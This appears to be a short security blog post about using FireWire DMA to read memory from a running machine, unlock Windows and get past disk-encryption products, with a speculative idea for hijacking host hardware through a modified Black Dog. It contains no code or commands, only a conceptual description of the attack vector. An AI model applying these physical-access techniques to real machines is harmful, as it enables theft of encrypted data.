Now, owning windows' unlock mechanism is good enough for a demo, and we all know if you have physical access you can do lots of stuff. However, one of the key growth industries in security is to provide more protection at the physical layer. Have a look at all the acquisitions and players in this space:

There are a lot of people spending a lot of money to make damn sure that you can't get at data if you have physical access. I've personally been involved in an evaluation of several of these products, and I can assure you they aren't cheap. Now, those clever boys at Princeton worked out that the right sort of hype would be to target these products in their coldboot attacks. But, here we have a cheaper and easier way to read the memory while the machine is still on, without any of those pesky controls getting in the way.

To be fair, many of these products provide anti-theft/theft detection/theft response type controls which include steps as drastic as automagically deleting the encryption keys. However, I can't see that being enabled without a hefty addition to your service desk and at least 'top secret' classified documents lounging about on your machine.

As an aside, I would really like to see someone modify Black Dog to use this firewire attack vector, and instead of 'autorunning' the X server, using DMA and the host's hardware to run it. This would allow you to 'hijack' the hardware of any machine you plug into. This could be a pretty cool feature; "Take your machine with you, leave the hardware".

Update: T'was only a matter of time: PointSec Disk Encryption Cracked via Firewire